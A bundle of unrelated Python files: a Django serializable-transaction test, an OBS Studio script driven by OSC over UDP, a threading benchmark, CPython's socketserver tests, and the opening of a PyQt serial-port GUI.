self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
|
test_serializable_count_can_fail.py
|
##############
# Setup Django
import django
django.setup()
#############
# Test proper
import threading
import time
import pytest
from django.db import DatabaseError, connection, transaction
from django.db.models import F, Subquery
from app.models import Sock
@pytest.mark.django_db
def test_serializable_count_can_fail():
def create():
Sock.objects.all().delete()
Sock.objects.create(id_a=1, id_b=1, colour='black', hits=1)
Sock.objects.create(id_a=2, id_b=2, colour='white', hits=1)
create_thread = threading.Thread(target=create)
create_thread.start()
create_thread.join()
barrier_1 = threading.Barrier(2)
barrier_2 = threading.Barrier(2)
barrier_3 = threading.Barrier(2)
def serializable_a():
with transaction.atomic():
cursor = connection.cursor()
cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')
Sock.objects.all().count()
barrier_1.wait()
Sock.objects.get(id_a=2).save()
barrier_2.wait()
caught = None
def serializable_b():
nonlocal caught
try:
with transaction.atomic():
cursor = connection.cursor()
cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')
Sock.objects.all().count()
barrier_1.wait()
Sock.objects.get(id_a=1).save()
barrier_2.wait()
except Exception as exception:
caught = exception
serializable_a_thread = threading.Thread(target=serializable_a)
serializable_a_thread.start()
serializable_b_thread = threading.Thread(target=serializable_b)
serializable_b_thread.start()
serializable_a_thread.join()
serializable_b_thread.join()
assert isinstance(caught, DatabaseError)
assert 'could not serialize access due to read/write dependencies among transactions' in caught.args[0]
|
OBS_OSC.py
|
#!/usr/bin/python
#
# OBS_OSC.py
#
# by Claude Heintz
# copyright 2014-2020 by Claude Heintz Design
#
# see license included with this distribution or
# https://www.claudeheintzdesign.com/lx/opensource.html
#
import socket
import threading
import time
from select import select
import math
import struct
import obspython as obs
OBS_OSC_PORT = 17999
OBS_OSC_AUTO_START = 1
#########################################
#
# This script responds to OSC messages received from port OBS_OSC_PORT
# in OSCListener's dispatch_message() method by calling the appropriate
# functions from obspython
#
# Note:
# Most OSC triggers require a 1.0 float argument [1.0] so that
# they are compatible with TouchOSC type buttons which
# send 1.0 when pressed and 0.0 when released.
#
# Arguments in the messages reference are noted with brackets []
#
# -------------------------------------------
#
# OBS OSC Messages:
#
#
# /obs/transition/start [1.0]
# triggers the current transition
#
# /obs/transition/NN/select [1.0]
# selects transition number NN (1 based)
# /obs/transition/1/select chooses first transition (index 0 in obspython)
#
# /obs/transition/NN/start [1.0]
# selects and executes transition number NN (1 based index)
# /obs/transition/1/start chooses first transition (index 0 in obspython)
#
# /obs/transition/duration [DD]
# sets duration of current transition. DD is an int argument in milliseconds.
#
# /obs/transition/NN/duration [DD]
# sets duration of transition number NN (1 based).
# DD is an int argument in milliseconds.
#
# /obs/transition/duration/DD [1.0]
# sets duration of current transition. DD is in milliseconds.
# argument is 1.0 float for button trigger
#
# /obs/scene/NN/preview [1.0]
# selects scene number NN (1 based)
# /obs/scene/1/preview sets the preview to the first scene (index 0 in obspython)
#
# /obs/scene/NN/start [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# following the transition, the next scene is selected for preview
#
# /obs/scene/NN/go [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# following the transition, the next scene is selected for preview
#
# /obs/scene/1/go sets the preview to the first scene (index 0 in obspython)
# following the transition, the second scene is set to preview
#
# /obs/scene/NN/transition/MM/start [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# using transition number MM (1 based)
#
# /obs/scene/NN/transition/MM/go [1.0]
# selects scene number NN (1 based) and then transitions to that scene
# using transition number MM (1 based)
# following the transition, the next scene is selected for preview
#
# /obs/scene/2/transition/2/go sets the preview to the second scene in the list
# (index 1 in obspython) then transitions to that scene using the second transition
# (index 1 in obspython)
# following the transition, the third scene is set to preview
#
# /obs/go [1.0]
# transitions to the current previewed scene using the current transition
# following the transition, the scene following the former preview scene
# in the scene list is selected for preview
#
# /obs/recording/start [1.0]
# starts recording
#
# /obs/recording/stop [1.0]
# stops recording
#
# /obs/streaming/start [1.0]
# starts streaming
#
# /obs/streaming/stop [1.0]
# stops streaming
#
#########################################
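#########################################
#
# Illustrative only (not part of the original script): a controller such as
# TouchOSC produces packets like the one sketched below. Per the OSC spec the
# address pattern and the ",f" type tag string are each null-terminated and
# padded to a multiple of four bytes, followed by a big-endian float argument,
# which is exactly what process_message_at() below expects:
#
#     import socket, struct
#     def osc_pad(b):
#         return b + b'\0' * (4 - len(b) % 4)
#     msg = osc_pad(b'/obs/go') + osc_pad(b',f') + struct.pack('>f', 1.0)
#     socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(msg, ('127.0.0.1', OBS_OSC_PORT))
#
#########################################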
#########################################
#
# OSCListener
# implements basic OSC UDP receiving and parsing
#
# start_listening(port)
# starts a thread that listens for UDP packets on the specified port
#
# stop_listening()
# terminates the listen loop/thread
#
# dispatch_message()
# is called when an OSC message is received, after
# its addressPattern and args[] are extracted
# obspython methods are called based on the addressPattern
#
#########################################
class OSCListener:
def __init__(self):
self.listen_thread = None
#########################################
#
# start_listening creates the listening socket
# and creates a thread that runs the listen() method
#
#########################################
def start_listening(self, port):
self.udpsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udpsocket.bind(('',port))
self.udpsocket.setblocking(False)
self.udpsocket.settimeout(1)
self.listening = True
if self.listen_thread is None:
self.listen_thread = threading.Thread(target=self.listen)
self.listen_thread.daemon = True
self.listen_thread.start()
#########################################
#
# stop_listening sets a flag which will cause the listen loop to end on the next pass
#
#########################################
def stop_listening(self):
self.listening = False
self.udpsocket.close()
self.udpsocket = None
#########################################
#
# listen contains a loop that runs while the self.listening flag is True
# listen uses select to determine if there is data available from the port
# if there is, packet_received is called
# if not, the thread sleeps for a tenth of a second
#
#########################################
def listen(self):
input = [self.udpsocket]
while self.listening:
if self.udpsocket != None and self.udpsocket.fileno() >= 0:
inputready,outputready,exceptready = select(input,[],[],0)
if ( len(inputready) == 1 ):
self.data,addr = self.udpsocket.recvfrom(256)
self.msglen = len(self.data)
self.packet_received()
else:
time.sleep(0.1)
else:
                self.listening = False
self.listen_thread = None
#########################################
#
# packet_received
# calls process_message_at for each complete OSC message
# contained in the packet
#
#########################################
def packet_received(self):
dataindex = 0
while ( (dataindex >= 0 ) and ( dataindex < self.msglen ) ):
dataindex = self.process_message_at(dataindex);
#########################################
#
# process_message_at
# extracts the addressPattern and argument list from the OSC message
#
# currently the only supported arguments are floats and integers and strings
#
# returns the index at the end of the complete message
#
#########################################
def process_message_at(self, si):
        oi = 0
        dl = 0
zl = self.next_zero(si)
        # ensure that the string will terminate with room for 4 bytes of type definition
if zl + 4 < self.msglen:
addressPattern = self.string_from_index(si)
if addressPattern.startswith('/'):
# determine the current index for the type character
tl = self.next_index_for_string(addressPattern,si)
# determine the current index for the data location
dl = self.next_index_for_index(self.next_zero(tl))
# if there's space for at least one argument, start a loop extracting
                # arguments defined in the type string and adding them to the args list
if dl+4 <= self.msglen:
if self.data[tl] == ord(','):
tl += 1
args = []
done = False
while ( not done) and ( (dl+4) <= self.msglen ):
if self.data[tl] == 0:
done = True
elif self.data[tl] == ord('f'):
a = struct.unpack_from('>f', self.data, dl)
args.append(float(a[0]))
dl += 4
elif self.data[tl] == ord('i'):
                            a = struct.unpack_from('>i', self.data, dl)
                            args.append(int(a[0]))
                            dl += 4
elif self.data[tl] == ord('s'):
es = self.next_zero(dl)
if es <= self.msglen:
a = self.string_from_index(dl)
args.append(a)
dl = self.next_index_for_index(es)
else:
done = True
oi = -1
                        else:  # unrecognized argument type; length unknown
done = True
oi = -1
tl += 1
# when done with the argument extraction loop, call dispatch_message
self.dispatch_message(addressPattern, args)
else: # <- no arguments but an address pattern
oi = -1
self.dispatch_message(addressPattern, [])
else:
oi = -1
if oi != -1:
oi = dl #dl could point to another message within the packet
return oi
#########################################
#
# next_zero
# searches for the next null character in the data starting at index si
#
#########################################
def next_zero(self, si):
i = si
notfound = True
s = ''
while notfound and i<self.msglen:
if self.data[i] == 0:
notfound = False
else:
i += 1
return i
#########################################
#
# next_index_for_string
# determines a 4 byte padded index for the
# length of the string starting from si
#
#########################################
def next_index_for_string(self, s, start):
ml = math.trunc(len(s) / 4) + 1;
return start + (ml*4);
#########################################
#
# next_index_for_index
# determines a 4 byte padded index starting from i
#
#########################################
def next_index_for_index(self, i):
ml = math.trunc(i / 4) + 1;
return ml*4;
#########################################
#
# string_from_index
# extracts a null terminated string starting at index si
#
#########################################
def string_from_index(self, si):
i = si
noterm = True
s = ''
while noterm and i<len(self.data):
if self.data[i] == 0:
noterm = False
else:
s += chr(self.data[i])
i += 1
return s
#########################################
#
# check_arg_one()
# Check for a single float argument equal to 1.0.
#
# used for actions controlled by a push button
# that sends 1.0 when pressed
# 0.0 when released
#
#########################################
def check_arg_one(self, args):
if len(args) == 1:
if args[0] == 1.0:
return True
return False
#########################################
#
# dispatch_message
# called when OSC Message is received and processed
#
#########################################
def dispatch_message(self, addressPattern, args):
# break addressPattern into parts
parts = addressPattern.split('/')
if len(parts) > 2:
if parts[1] == "obs": #/obs/...
if parts[2] == "source": # /obs/source/...
self.dispatch_obs_source(parts, args)
elif parts[2] == "transition": # /obs/transition/...
self.dispatch_obs_transition(parts, args)
elif parts[2] == "scene": # /obs/scene/...
self.dispatch_obs_scene(parts, args)
elif parts[2] == "go": # /obs/go
self.dispatch_obs_go(parts, args)
elif parts[2] == "recording": # /obs/recording/...
self.dispatch_obs_recording(parts, args)
elif parts[2] == "streaming": # /obs/streaming/...
self.dispatch_obs_streaming(parts, args)
#########################################
#
# dispatch_obs_source(self, parts, args)
# /obs/source/...
#
#########################################
def dispatch_obs_source(self, parts, args):
if len(parts) == 4:
if parts[3] == "volume": # /obs/source/volume [NN, V.V]
if len(args) == 2:
source_volume(args[0], args[1])
if len(parts) == 5:
if parts[4] == "volume": # /obs/source/NN/volume [V.V]
if len(args) == 1:
source_volume(parts[3], args[0])
#########################################
#
# dispatch_obs_transition(self, parts, args)
# /obs/transition/...
#
#########################################
def dispatch_obs_transition(self, parts, args):
if len(parts) == 4:
if parts[3] == "start": # /obs/transition/start [1.0]
if self.check_arg_one(args):
transition()
elif parts[3] == "duration": # /obs/transition/duration [DD]
set_transition_duration(int(args[0]))
if len(parts) == 5: # /obs/transition/NN/start [1.0]
if parts[4] == "start":
if self.check_arg_one(args):
transition(int(parts[3])-1)
elif parts[4] == "select": # /obs/transition/NN/select [1.0]
if self.check_arg_one(args):
set_transition(int(parts[3])-1)
elif parts[4] == "duration": # /obs/transition/NN/duration [DD]
set_transition_duration(int(args[0]), int(parts[3])-1)
elif parts[3] == "duration": # /obs/transition/duration/DD [1.0]
if self.check_arg_one(args):
set_transition_duration(int(parts[4]))
#########################################
#
# dispatch_obs_scene(self, parts, args)
# /obs/scene/...
#
#########################################
def dispatch_obs_scene(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 5:
if parts[4] == "preview": # /obs/scene/n/preview
set_preview(int(parts[3])-1)
elif parts[4] == "start": # /obs/scene/n/start
set_preview(int(parts[3])-1)
time.sleep(0.2)
transition()
elif parts[4] == "go": # /obs/scene/n/go
set_preview(int(parts[3])-1)
time.sleep(0.2)
go()
elif len(parts) == 7:
if parts[4] == "transition":
if parts[6] == "start":
set_preview(int(parts[3])-1)
time.sleep(0.2)
transition(int(parts[5])-1)
elif parts[6] == "go":
set_preview(int(parts[3])-1)
time.sleep(0.2)
go(int(parts[5])-1)
#########################################
#
# dispatch_obs_go(self, parts, args)
# /obs/go [1.0]
#
#########################################
def dispatch_obs_go(self, parts, args):
if self.check_arg_one(args):
go()
#########################################
#
# dispatch_obs_recording(self, parts, args)
# /obs/recording/...
#
#########################################
def dispatch_obs_recording(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 4:
if parts[3] == "start": # /obs/recording/start
obs.obs_frontend_recording_start()
if parts[3] == "stop": # /obs/recording/stop
obs.obs_frontend_recording_stop()
#########################################
#
# dispatch_obs_streaming(self, parts, args)
# /obs/streaming/...
#
#########################################
def dispatch_obs_streaming(self, parts, args):
if self.check_arg_one(args):
if len(parts) == 4:
if parts[3] == "start": # /obs/streaming/start
obs.obs_frontend_streaming_start()
if parts[3] == "stop": # /obs/streaming/stop
obs.obs_frontend_streaming_stop()
############################################
#^^^^^^^^^^ end class OSCListener ^^^^^^^^^^
#
# begin main section
############################################
# global OSCListener object
oscin = None
#########################################
#
# set_preview(idx)
# sets the OBS preview to scene with index idx if it exists
#
#########################################
def set_preview(idx):
scenes = obs.obs_frontend_get_scenes()
if idx < len(scenes) and idx >= 0:
obs.obs_frontend_set_current_preview_scene(scenes[idx])
#########################################
#
# set_transition(idx)
# selects the OBS transition with index idx if it exists
#
#########################################
def set_transition(idx):
transitions = obs.obs_frontend_get_transitions()
if idx < len(transitions) and idx >= 0:
obs.obs_frontend_set_current_transition(transitions[idx])
#########################################
#
# set_transition_duration(d, idx=-1)
# sets the duration of the current transition, or of the transition with index idx, to d (ms)
#
#########################################
def set_transition_duration(d, idx=-1):
trans = None
if idx == -1:
trans = obs.obs_frontend_get_current_transition()
else:
transitions = obs.obs_frontend_get_transitions()
if idx < len(transitions) and idx >= 0:
trans = transitions[idx]
if trans != None:
obs.obs_transition_enable_fixed(trans, True, d)
#########################################
#
# nextScene()
# returns the scene after the current preview scene
# returns the first scene if the end of the list is reached or no preview is set
# (must have at least one scene or an IndexError will be raised)
#
#########################################
def nextScene():
scenes = obs.obs_frontend_get_scenes()
if len(scenes) > 1:
c_scene = obs.obs_frontend_get_current_preview_scene()
if c_scene != None:
i = scenes.index(c_scene) + 1
if i < len(scenes):
return scenes[i]
return scenes[0]
#########################################
#
# transition(idx)
# executes the transition with index idx
#
# transition()
# executes the currently selected transition
#
#########################################
def transition(idx = -1):
trans = None
if idx >= 0 :
set_transition(idx)
trans = obs.obs_frontend_get_current_transition()
mode = obs.OBS_TRANSITION_MODE_AUTO
duration = 0
p_scene = obs.obs_frontend_get_current_preview_scene()
obs.obs_transition_start(trans, mode, duration, p_scene)
obs.obs_frontend_set_current_scene(p_scene)
#########################################
#
# go()
# executes the currently selected transition
# then selects the next scene for preview
#
# go(idx)
# executes the transition with index idx
# then selects the next scene for preview
#
#########################################
def go(idx = -1):
n_scene = nextScene()
transition(idx)
time.sleep(2)
obs.obs_frontend_set_current_preview_scene(n_scene)
def source_volume(src, volume):
#n_scene = nextScene()
sources = obs.obs_enum_sources()
found = None
if sources is not None:
for source in sources:
source_id = obs.obs_source_get_id(source)
name = obs.obs_source_get_name(source)
if name == src:
found = source
if found != None:
obs.obs_source_set_volume(found, float(volume))
#########################################
# start_osc
# create OSCListener if needed and start listening
#########################################
def start_osc():
global oscin
global OBS_OSC_PORT
if oscin == None:
oscin = OSCListener()
oscin.start_listening(OBS_OSC_PORT)
print("OSC started on port " + str(OBS_OSC_PORT))
#########################################
# stop_osc
# if OSCListener exists, stop listening & release
#########################################
def stop_osc():
global oscin
if oscin != None:
oscin.stop_listening()
oscin = None
print("OSC stopped.")
#########################################
# listen_pressed
# callback when start button clicked
#########################################
def listen_pressed(props, prop):
start_osc()
#########################################
# stop_pressed
# callback when stop button clicked
#########################################
def stop_pressed(props, prop):
stop_osc()
#########################################
# port_field_changed
# callback when the port number is changed
#########################################
def port_field_changed(props, prop_id, settings_data):
global oscin
global OBS_OSC_PORT
global OBS_OSC_AUTO_START
pport = obs.obs_data_get_int(settings_data, "osc-port")
if pport != 0:
OBS_OSC_PORT = pport
if oscin != None:
stop_osc()
print("restarting...")
start_osc()
#########################################
# obspython functions
#########################################
def script_defaults(settings_data):
global OBS_OSC_PORT
obs.obs_data_set_int(settings_data, "osc-port", OBS_OSC_PORT)
def script_update(settings):
global OBS_OSC_AUTO_START
if OBS_OSC_AUTO_START == 1:
start_osc()
OBS_OSC_AUTO_START = 0 #only first time
def script_unload():
stop_osc()
def script_description():
return '''Control OBS preview, transitions and start/stop via OSC.'''
def script_properties():
props = obs.obs_properties_create()
obs.obs_properties_add_button(props, "start-button", "Start OSC", listen_pressed)
obs.obs_properties_add_button(props, "stop-button", "Stop OSC", stop_pressed)
    port_field = obs.obs_properties_add_int(props, "osc-port", "OSC Port", 1001, 65535, 1)
obs.obs_property_set_modified_callback(port_field, port_field_changed)
return props
|
two_thread.py
|
## in two threads
import time
from threading import Thread
def countup(N):
n = 0
while n < N:
n += 1
if __name__ == '__main__':
max_for_thread = 30000000//2
first_thread = Thread(target=countup, args=(max_for_thread,))
second_thread = Thread(target=countup, args=(max_for_thread,))
st_time = time.time()
first_thread.start()
second_thread.start()
first_thread.join()
second_thread.join()
end_time = time.time()
    print(f'Execution time: {end_time-st_time}')
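    # Note (not part of the original snippet): because of CPython's GIL the two
    # threads run the CPU-bound countup() loops one at a time, so the measured
    # time is typically no better than a single call to countup(30000000).
    # A process-based variant along these lines would sidestep the GIL:
    #
    #     from multiprocessing import Process
    #     p1 = Process(target=countup, args=(max_for_thread,))
    #     p2 = Process(target=countup, args=(max_for_thread,))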
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import threading
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=test.support.SHORT_TIMEOUT):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
test.support.wait_process(pid, exitcode=72)
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
try:
server = MyServer(addr, MyHandler)
except PermissionError as e:
# Issue 29184: cannot bind() a Unix socket on Android.
self.skipTest('Cannot create server (%s, %s): %s' %
(svrcls, addr, e))
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
            # bpo-31151: Check that ForkingMixIn.server_close() waits until
            # all children have completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_STREAM) as s:
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def dgram_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_DGRAM) as s:
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
        # Issue #2302: shutdown() should always succeed in making another
        # thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
        # Create many servers for which bind() will fail, to see if this results
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
main.py
|
# -*- coding: utf-8 -*-
import socket
import serial
import serial.tools.list_ports
import sys
from subprocess import PIPE, Popen
from threading import Thread
import os
import re
import signal
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
from PyQt5.QtWidgets import (
QApplication, QMainWindow, QMessageBox
)
from PyQt5 import QtGui
from main_window_ui import Ui_oMainWind
class Window(QMainWindow, Ui_oMainWind):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.sys_ports = []
self.ui = Ui_oMainWind()
self.ui.setupUi(self)
self.connectSignalsSlots()
self.bStartStopFlag = False
self.oSocketHolder = None
self.oSerialHolder = None
self.oConnectHolder = None
self.bNormalConnect = False
self.oProcess = Popen
self.oQueue = Queue
self.oThread = Thread
def connectSignalsSlots(self):
